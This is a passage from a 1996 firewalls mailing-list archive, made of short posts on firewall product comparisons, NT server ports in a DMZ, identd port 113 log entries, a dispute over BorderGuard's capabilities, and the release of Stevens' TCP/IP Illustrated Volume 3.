Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have you ever been to http://www.data.com/Lab_Tests/Firewalls.html? There are very helpful comparison data for some firewalls. At 01:07 PM 96/02/13 -0600, you wrote: > >Network Computing (just arrived today) has a review of 6 firewall >products. I haven't read it yet, I don't know which ones they are >evaluating. It's a feature article though. > >[ This message has been sent to the firewalls list. If you reply to > this message to the list, please do not CC me on the reply. I subscribe > to the list and will read it there ] > > >-- >____________________________________________________________________________ >Doug Hughes Engineering Network Services >System/Net Admin Auburn University > doug@eng.auburn.edu > Pro is to Con as progress is to congress > > ------------------------------------------------------------------- Kang, Eun-Seong Samsung Electronics Co, Ltd. kes@coda.info.samsung.co.kr San 14, Nongseo-Ri, Kihung-Eup, phone) +82-331-280-9425 Yongin-Kun, Kyungki-Do, Korea. ------------------------------------------------------------------- From firewalls-owner Wed Feb 14 01:39:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA09583 for firewalls-outgoing; Wed, 14 Feb 1996 01:11:35 -0800 (PST) Received: from ncept.pt.nce.sita.int (ncept.pt.nce.sita.int [57.7.6.251]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA09578 for ; Wed, 14 Feb 1996 01:11:24 -0800 (PST) Received: from pc_ptdv.pt.nce.sita.int by ncept.pt.nce.sita.int (8.7.3/SitaNet-1.4) id KAA14597; Wed, 14 Feb 1996 10:14:38 +0100 (MET) Date: Wed, 14 Feb 96 09:36:34 PST From: Denis Valois Subject: RE: Firewall comparison chart??? To: Phil Davidson Cc: firewalls@greatcircle.com X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 13 Feb 96 11:27:25 GMT Phil Davidson wrote: >Just wondering if anyone has seen a chart that compares >the various Firewall packages currently available. >The kind that lists which features are available >or not or the different packages. > >cheers >Phil > The more complete chart I've seen is in the following ref. George R. Kurtz & David Roath. "Shopping for Firewalls", in Infosecurity News, MIS Institute Press, 1995. [info: (508) 879-9792]. Very complete chart. Includes "Product type", "proxies supported", "authentication supported", "authentication provided", "security features", "auditing features", "administration features", and "pricing and support". All the above categories are cut in 4-5 columns. There are 26 products/suppliers listed. Denis Valois Internetworking Technologies, Security Team (NCEPWXS) SITA (Societe Internationale de Telecommunications Aeronautiques) HERAKLION - 1041 route des Dolines 06560 Valbonne France tel: (+33) 92.96.63.91 fax: (+33) 92.96.64.91 net: Denis.Valois@pt.nce.sita.int From firewalls-owner Wed Feb 14 02:05:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA10853 for firewalls-outgoing; Wed, 14 Feb 1996 01:28:06 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA10816 for ; Wed, 14 Feb 1996 01:27:55 -0800 (PST) Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA02236; Wed, 14 Feb 1996 04:27:16 -0500 Received: from mojo.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA25771; Wed, 14 Feb 1996 09:27:13 GMT Received: from pdavidson.europe.dg.com by mojo.europe.dg.com (5.4R3.10/dg-gens08) id AA21658; Wed, 14 Feb 1996 09:27:01 GMT Message-Id: <9602140927.AA21658@mojo.europe.dg.com> Comments: Authenticated sender is From: "Phil Davidson" Organization: Data General To: firewalls@greatcircle.com Date: Wed, 14 Feb 1996 09:28:09 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: a word of thanks Reply-To: fil@mojo.europe.dg.com X-Mailer: Pegasus Mail for Windows (v2.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks to all who who responded with my request for a Firewalls comparison chart. It most appreciated cheers Phil From firewalls-owner Wed Feb 14 02:54:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA14379 for firewalls-outgoing; Wed, 14 Feb 1996 02:47:25 -0800 (PST) Received: from gatekeeper.frontec.se (gatekeeper.frontec.se [193.13.192.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA14374 for ; Wed, 14 Feb 1996 02:47:15 -0800 (PST) Received: from tintin.lule.frontec.se (root@tintin.lule.frontec.se [192.36.15.4]) by gatekeeper.frontec.se (8.6.12/8.6.6) with SMTP id LAA23519 for ; Wed, 14 Feb 1996 11:46:05 +0100 Received: from goozer.arctic (goozer.lule.frontec.se) by tintin.lule.frontec.se with SMTP id AA08134 (5.67a8/IDA-1.5 for ); Wed, 14 Feb 1996 11:46:03 +0100 Received: by goozer.arctic (SMI-8.6/SMI-SVR4) id LAA00586; Wed, 14 Feb 1996 11:45:20 +0100 Date: Wed, 14 Feb 1996 11:45:20 +0100 From: Petter.Haggman@lule.frontec.se (Petter H{ggman) Message-Id: <199602141045.LAA00586@goozer.arctic> To: firewalls@GreatCircle.COM Subject: Win NT protocols? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Content-Md5: y704dREE89cHfljSdhq3zw== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi! Is there anyone who can enlighten me about NT's protocol ports? I've been asked for permission to put an NT server on the DMZ, and they want to be able to administer it from the inside. That means that I need to find out what ports that are necessary to let this happen, and eventual security hazards involved... Appreciates all facts and experiences...;-) Tia /Petter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~= ~~~~ Petter Haggman Email: Petter.Haggman@lule.frontec.se Arctic Software AB Phone: +46 920 75116 , Fax: +46 920 75199 Aurorum 1, S-977 75 Lulea, Sweden GSM: 070 - 582 23 83 From firewalls-owner Wed Feb 14 03:24:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15806 for firewalls-outgoing; Wed, 14 Feb 1996 03:14:37 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA15771 for ; Wed, 14 Feb 1996 03:14:25 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id GAA05275 for ; Wed, 14 Feb 1996 06:16:43 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa20073; 14 Feb 96 6:11 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA824307224; Tue, 13 Feb 96 18:15:07 EST Date: Tue, 13 Feb 96 18:15:07 EST From: Kyle Amon Message-Id: <9601148243.AA824307224@jabil.com> To: firewalls@greatcircle.com Subject: Re: port 113? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there any reason (other than the loss of remote user identification services on my host) that I might _not_ want to disable identd? Seems to me I have no need for it. Kyle Amon ______________________________ Forward Header __________________________________ Subject: Re: port 113? Author: Bill Bunting at Smtplink_South Date: 2/10/96 8:07 AM At 11:36 AM 2/9/96 +0500, Jim Legg wrote: >Hi, > >I noticed in my log files the following (just a snippet): > >2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn >2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn >2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn >2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) >2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) >2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > >When this web site (nslookup returns Facade.COM) is accessed it tries to come >back to your system on port 113. What is this port? (It's not listed in my >/etc/services) This is the ident protocol. The WWW server is trying to associate a user name with the connection by using the identification protocol. Sendmail will do the same thing (if configured). --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Wed Feb 14 03:54:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA17126 for firewalls-outgoing; Wed, 14 Feb 1996 03:48:52 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA17120 for ; Wed, 14 Feb 1996 03:48:43 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA04915; Wed, 14 Feb 96 05:51:01 CST Received: by mnbp.network.com with Microsoft Mail id <3121CB74@mnbp.network.com>; Wed, 14 Feb 96 05:45:56 CST From: Michael Brown To: jeromie , sengle Cc: firewalls Subject: RE: Gauntlet 3.1 Packet Filter? Date: Wed, 14 Feb 96 05:44:00 CST Message-Id: <3121CB74@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BROWNMK@misf.network.com wrote: > You're looking for the NSC equipment, i.e. BorderGuard. > check out www.network.com and look at security stuff. > > _____________________________________________________ sengle@hti.net wrote: > Subject: Gauntlet 3.1 Packet Filter? > Date: Monday, February 12, 1996 2:00PM > > I checked out the TIS web sight and could not find any specific statments > toward "yes, it packet filters". jeromie wrote: Don't forget to mention that your BorderGuard product is simply a packet filtering mechanism. ______________________________________________ You should doublecheck the network.com web site. This is NOT simply a packet filter device. This is an Application level firewall, ehanced packet filtering, Secure VPN access device, and encryption routing device supporting DES, 3DES, NSC1 and IDEA standards, plus MUCH more. I am not going to do a sales job on y'all, but don't make a statement that is incorrect. As a packet filtering device the performance is faster than any other other product on the market because of the hardware architecture design. mkb From firewalls-owner Wed Feb 14 04:39:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA18868 for firewalls-outgoing; Wed, 14 Feb 1996 04:33:44 -0800 (PST) Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA18863 for ; Wed, 14 Feb 1996 04:33:40 -0800 (PST) Received: from vse1 by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id JAA17257; Sun, 11 Feb 1996 09:26:43 -0500 Received: from jeffs_winpc by vse1 (4.1/SMI-4.1) id AA05549; Wed, 14 Feb 96 07:28:42 EST Message-Id: <9602141228.AA05549@vse1> X-Sender: jtank@vse1.vsecorp.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 14 Feb 1996 07:32:44 -0500 To: firewalls@GreatCircle.COM From: "Jeffry L'H. Tank" Subject: list of port numbers above 255 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all Can anyone tell me if ther is a faq or rfc detailing port numbers above 255, I have already downloaded rfc 1010. Is this the lastest rgc on assigned-numbers? Thanks Jeffry L'H. Tank sysop VSE Corp. Internet Server From firewalls-owner Wed Feb 14 04:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19424 for firewalls-outgoing; Wed, 14 Feb 1996 04:48:36 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19419 for ; Wed, 14 Feb 1996 04:48:32 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA04166; Wed, 14 Feb 1996 07:45:39 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA28821; Wed, 14 Feb 1996 07:44:22 +0500 Date: Wed, 14 Feb 1996 07:44:22 +0500 Message-Id: <9602141244.AA28821@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: Re: Firewall comparison chart??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:07 PM 2/13/96 -0600, Doug Hughes wrote: > >Network Computing (just arrived today) has a review of 6 firewall >products. I haven't read it yet, I don't know which ones they are >evaluating. It's a feature article though. > I read the article. It seemed to me to just concentrate on how easy each of the considered firewalls were to setup and maintain. Of course, because of that Firewall-1 was the one they slobbered over, with Harris' Cyberguard coming in second. -jim- ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... | | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________| From firewalls-owner Wed Feb 14 05:11:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20357 for firewalls-outgoing; Wed, 14 Feb 1996 05:04:34 -0800 (PST) Received: from eci-esyst.com (callisto.eci-esyst.com [199.186.17.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20349 for ; Wed, 14 Feb 1996 05:04:26 -0800 (PST) Received: by eci-esyst.com (4.1/SMI-4.1) id AA14974; Wed, 14 Feb 96 07:59:17 EST Received: from rodney.eci-esyst.com(199.186.17.5) by callisto.eci-esyst.com via smap (V1.3mjr) id sma014945; Wed Feb 14 07:58:39 1996 Received: from qmgate (qmgate.eci-esyst.com) by callisto (4.1/SMI-4.1) id AA04229; Wed, 14 Feb 96 07:59:55 EST Message-Id: Date: 14 Feb 1996 07:59:17 -0500 From: "Tim Darnauer" Subject: Re#c#_Firewall_comparison_ch#201# To: "firewalls*greatcircle.com" X-Mailer: Mail*Link SMTP-QM 3.0.2 Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1"; Name="Message Body" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk RE>>Firewall comparison ch* via Mail*Link=AE for = PowerTalk*/QM Try Computer Security Journal, Vol XI, No. 1, 1995. They have an = extensive chart. From firewalls-owner Wed Feb 14 05:25:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19785 for firewalls-outgoing; Wed, 14 Feb 1996 04:56:11 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19777 for ; Wed, 14 Feb 1996 04:56:06 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA04251; Wed, 14 Feb 1996 07:53:13 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA28842; Wed, 14 Feb 1996 07:51:56 +0500 Date: Wed, 14 Feb 1996 07:51:56 +0500 Message-Id: <9602141251.AA28842@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: RE: Web browser ports? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Volume 3 of Stevens? What is this one about, has it been out for long? > Copyright 1993. ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... | | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________| From firewalls-owner Wed Feb 14 05:39:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20040 for firewalls-outgoing; Wed, 14 Feb 1996 04:59:50 -0800 (PST) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20009 for ; Wed, 14 Feb 1996 04:59:39 -0800 (PST) Received: from tidtest.total.fr by pegase.total.fr with SMTP (16.6/16.2) id AA06435; Wed, 14 Feb 96 13:54:14 +0100 Received: by tidtest.total.fr (4.1/SMI-4.1) id AA04878; Sun, 14 Jan 96 13:57:35 GMT Message-Id: <9601141357.AA04878@tidtest.total.fr> To: Sick Puppy Cc: firewalls@greatcircle.com Subject: Re: Need a few pointers In-Reply-To: Your message of "Mon, 05 Feb 1996 17:41:51 EST." Date: Sun, 14 Jan 1996 13:57:34 +0000 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message , Sick Puppy writes: > There was a very good response to my query. I had no idea there were > so many security problems and performance problems associated with > WindBlows 95. Sounds like the operating system was written by a couple > of drunken cats. In a couple of days I will get the responses together > in one file, together with a couple of good web pointers, and pass it on > to anyone who wants an e-mailed copy. > > Sick Puppy, the Cat_Eating_Dawg Either you didn't get to post it or (more likely) I was careless with the delete button :-(. Could you send me a copy ? advTHANKSance Michel Lavondes (lavondes@tidtest.total.fr) #include ** CDA warning : don't read this if you're under 18 ** Don't whistle while you piss Hagbard Celine From firewalls-owner Wed Feb 14 06:32:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA23044 for firewalls-outgoing; Wed, 14 Feb 1996 06:11:45 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA23037 for ; Wed, 14 Feb 1996 06:11:39 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199602141411.GAA23037@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 7593; Wed, 14 Feb 96 09:10:42 EST Date: Wed, 14 Feb 1996 09:10:41 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: PC s/w for testing TCP Ports Sender: firewalls-owner@GreatCircle.COM Precedence: bulk subject:PC s/w for testing TCP Ports Can anyone direct me to a ftp site that holds a PC program for testing TCP ports? Ideally it should allow me to specify an IP address and a port number, and then create packets from entry via the screen. Any return packets should have the payload stripped out & displayed - but it would be nice to be able to view the whole packet. Im looking for this to enable me to test a firewall product. Mark gblolmxb@ibmmail.com From firewalls-owner Wed Feb 14 06:39:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA23250 for firewalls-outgoing; Wed, 14 Feb 1996 06:18:39 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA23221 for ; Wed, 14 Feb 1996 06:18:30 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA02503; Wed, 14 Feb 96 08:15:16 CST Date: Wed, 14 Feb 96 08:15:16 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602141415.AA02503@garrison.com.> To: sengle@hti.net, BROWNMK@misf.network.com Subject: RE: Gauntlet 3.1 Packet Filter? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > BROWNMK@misf.network.com wrote: > > You're looking for the NSC equipment, i.e. BorderGuard. > > check out www.network.com and look at security stuff. > > > > _____________________________________________________ > > sengle@hti.net wrote: > > Subject: Gauntlet 3.1 Packet Filter? > > Date: Monday, February 12, 1996 2:00PM > > > > I checked out the TIS web sight and could not find any specific statments > > toward "yes, it packet filters". > > jeromie wrote: > Don't forget to mention that your BorderGuard product is simply a > packet filtering mechanism. > > ______________________________________________ > You should doublecheck the network.com web site. This is NOT simply > a packet filter device. This is an Application level firewall, ehanced > packet filtering, Secure VPN access device, and encryption routing device > supporting DES, 3DES, NSC1 and IDEA standards, plus MUCH more. I am not > going to do a sales job on y'all, but don't make a statement that is > incorrect. As a packet filtering device the performance is faster than any > other other product on the market because of the hardware architecture > design. > mkb Uhhuh... I thought we were talking about the BorderGuard product. I am familar with the product, as we have purchased & installed them before for a client. They are basically a router with an encryption engine in it. I would agree with you that the product has good throughput, from what we've seen. As for being an 'application gateway' it's not, unless you changed it in the last 2 months. Basically it uses packet filtering for access control, can do encryption to create VPN's, and also w/ the DPF facility can look @ bytes @ given offsets within the packets. This does NOT constitute an application level gateway. Where are your proxies? (Don't tell me they are in the firmware. Jeromie Jackson Garrison technologies jeromie@garrison.com From firewalls-owner Wed Feb 14 07:12:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA24725 for firewalls-outgoing; Wed, 14 Feb 1996 07:01:36 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA24711 for ; Wed, 14 Feb 1996 07:01:24 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id JAA08544; Wed, 14 Feb 1996 09:58:26 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA29252; Wed, 14 Feb 1996 09:57:09 +0500 Date: Wed, 14 Feb 1996 09:57:09 +0500 Message-Id: <9602141457.AA29252@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: Re: Web browser ports? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> >Volume 3 of Stevens? What is this one about, has it been out for long? >> Copyright 1993. > >Uhmm... Volume 1 of Stevens did not come out until 1994. Volume 2 was >released in 1995. Are you perhaps thinking of Comer "Internetworking >with TCP/IP" [3 volumes] rather than Stevens "TCP/IP Illustrated" [only >2 that I know of]? Perhaps you mean some other Stevens? What is the >title? > Oops. You're right. -jim- ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... | | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________| From firewalls-owner Wed Feb 14 07:34:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA24768 for firewalls-outgoing; Wed, 14 Feb 1996 07:02:57 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA24759 for ; Wed, 14 Feb 1996 07:02:49 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id KAA21638; Wed, 14 Feb 1996 10:02:10 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id KAA11907; Wed, 14 Feb 1996 10:02:03 -0500 (EST) Date: Wed, 14 Feb 1996 10:01:58 -0500 (EST) From: "Paul D. Robertson" To: Jim Legg cc: firewalls@GreatCircle.COM Subject: RE: Web browser ports? In-Reply-To: <9602141251.AA28842@sun1plus.liebert.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 14 Feb 1996, Jim Legg wrote: > Date: Wed, 14 Feb 1996 07:51:56 +0500 > From: Jim Legg > To: firewalls@GreatCircle.COM > Subject: RE: Web browser ports? > > >Volume 3 of Stevens? What is this one about, has it been out for long? > > > Copyright 1993. Right under that, first printing January 1996. > ___________________________________________________________________________ > | | | > | Jim Legg legg@liebert.com (smtp) | Speaking for myself... | > | leggj@liebert.com (cc:Mail) | | > |_______________________________________|___________________________________| > > ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Wed Feb 14 08:02:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA25735 for firewalls-outgoing; Wed, 14 Feb 1996 07:42:57 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA25730 for ; Wed, 14 Feb 1996 07:42:53 -0800 (PST) Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id KAA00798 for ; Wed, 14 Feb 1996 10:42:16 -0500 (EST) From: "Marcus J. Ranum" Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id KAA27729 for Firewalls@GreatCircle.COM; Wed, 14 Feb 1996 10:42:10 -0500 (EST) Message-Id: <199602141542.KAA27729@clark.net> Subject: Stevens, Vol 3 To: Firewalls@GreatCircle.COM Date: Wed, 14 Feb 1996 10:42:06 -0500 (EST) In-Reply-To: <199602140900.BAA09233@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Feb 14, 96 01:00:34 am Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Volume 3 of Stevens? What is this one about, has it been out for long? It's called "TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols" and it's only been out a short time. ISBN# is 0-201-63495-3 Basically, it looks like Rich has now studied IP and its implementation as part of his previous books, and has decided to fix it. :) Joking aside, the book is wonderful analysis of TCP and how/why it performs, including some really detailed studies of really nitty-gritty performance interactions. My take on this book is that it is an absolutely wonderful example of how to apply scientific thinking and analysis to a technological problem. This is going to sound odd, but the whole book reads like one of Jeff Mogul's USENIX papers -- which is a roundabout way of saying that it is of the highest caliber of technical writing and thinking. mjr. From firewalls-owner Wed Feb 14 08:15:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA25688 for firewalls-outgoing; Wed, 14 Feb 1996 07:40:04 -0800 (PST) Received: from cpmx.saic.com (cpmx.saic.com [139.121.16.80]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA25683 for ; Wed, 14 Feb 1996 07:40:00 -0800 (PST) Received: from cpqm.saic.com by cpmx.saic.com; Wed, 14 Feb 96 07:39:10 -0800 Message-ID: Date: 14 Feb 1996 10:04:35 -0700 From: "Ashley Miller" Subject: Re: Need a few pointers To: firewalls@greatcircle.com, "Sick Puppy" , "Michel Lavondes" X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Me too. ------------------------------ Date: 2/14/96 6:43 AM To: Ashley Miller From: Michel Lavondes In message , Sick Puppy writes: > There was a very good response to my query. I had no idea there were > so many security problems and performance problems associated with > WindBlows 95. Sounds like the operating system was written by a couple > of drunken cats. In a couple of days I will get the responses together > in one file, together with a couple of good web pointers, and pass it on > to anyone who wants an e-mailed copy. > > Sick Puppy, the Cat_Eating_Dawg Either you didn't get to post it or (more likely) I was careless with the delete button :-(. Could you send me a copy ? advTHANKSance Michel Lavondes (lavondes@tidtest.total.fr) #include ** CDA warning : don't read this if you're under 18 ** Don't whistle while you piss Hagbard Celine ------------------ RFC822 Header Follows ------------------ Received: by cpqm.saic.com with SMTP;14 Feb 1996 06:31:40 U Received: from relay6.UU.NET by cpmx.saic.com; Wed, 14 Feb 96 06:37:49 -0800 Received: from miles.greatcircle.com by relay6.UU.NET with ESMTP id QQacww06562; Wed, 14 Feb 1996 09:36:30 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20040 for firewalls-outgoing; Wed, 14 Feb 1996 04:59:50 -0800 (PST) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20009 for ; Wed, 14 Feb 1996 04:59:39 -0800 (PST) Received: from tidtest.total.fr by pegase.total.fr with SMTP (16.6/16.2) id AA06435; Wed, 14 Feb 96 13:54:14 +0100 Received: by tidtest.total.fr (4.1/SMI-4.1) id AA04878; Sun, 14 Jan 96 13:57:35 GMT Message-Id: <9601141357.AA04878@tidtest.total.fr> To: Sick Puppy Cc: firewalls@greatcircle.com Subject: Re: Need a few pointers In-Reply-To: Your message of "Mon, 05 Feb 1996 17:41:51 EST." Date: Sun, 14 Jan 1996 13:57:34 +0000 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Feb 14 08:28:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA26404 for firewalls-outgoing; Wed, 14 Feb 